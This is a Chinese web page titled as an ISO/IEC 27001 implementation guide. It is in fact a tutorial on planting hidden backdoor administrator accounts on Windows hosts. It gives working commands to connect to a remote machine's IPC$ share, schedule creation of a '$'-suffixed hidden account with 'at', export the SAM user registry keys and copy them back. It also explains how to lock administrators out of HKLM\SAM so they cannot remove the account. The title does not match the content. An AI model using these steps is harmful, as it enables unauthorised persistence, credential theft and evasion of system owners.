切断删除隐藏账户的途径-iso_iec_27001_2005规范与实施指南

（3）如何切断删除隐藏账户的途径呢？虽然在“命令提示符”和“计算机管理”中隐藏账户已经很安全，但老练的系统管理员依然有可能通过注册表编辑器删除这些账户。那么，怎样才能防止他们这样做呢？我们可以打开“regedt32.exe”，前往“HKEY_LOCAL_MACHINE\SAM”位置，设置“SAM”项的权限，将“administrators”的所有权限取消。这样，当管理员试图对“HKEY_LOCAL_MACHINE\SAM”下的项进行操作时，就会发生错误，且无法通过“regedt32.exe”重新赋予权限。即使没有经验的管理员发现了系统中的隐藏账户，也只能束手无策！

您是否考虑过如何远程创建超级用户账户呢？与远程主机建立连接，使用命令 net use 192.168.1.235\ipc$ "simple" /user:administrator。接着，通过 at 命令在远程主机上创建一个隐藏账户： at 192.168.1.235 11:29 c:\windows\system32\net.exe user abc$ 123 /add。为什么加上$符号呢？因为这样做可以在命令行下用 net user 不显示这个用户，而在账户管理器中却能看到。

如果你想更进一步，可以同样使用 at 命令导出 HKEY_LOCAL_MACHINE\SAM\Domains\account\users 下的键值： at 192.168.1.235 11:33 c:\windows\regedit.exe /e abc.reg HKEY_LOCAL_MACHINE\SAM\Domains\account\users。当然，必要时，可以用引号将路径括起来，比如 "c:\winnt\regedit.exe /e abc.reg HKEY_LOCAL_MACHINE\SAM\Domains\account\users"。将远程主机上的 abc.reg 下载到本机，用记事本打开进行编辑： copy 192.168.1.235\admin$\system32\abc.reg c:\abc.reg。

如果你对这些操作还不太熟悉，可以参考一些相关资料，比如 psuexe隐藏账户制作 或 WinXP创建隐藏账户，这些资源会提供详细的步骤和解释。添加超级隐藏账户 和 超级隐藏账户.zip 也是非常有用的参考资料。是不是感觉这些操作如同电影中的黑客手法？真是令人着迷啊！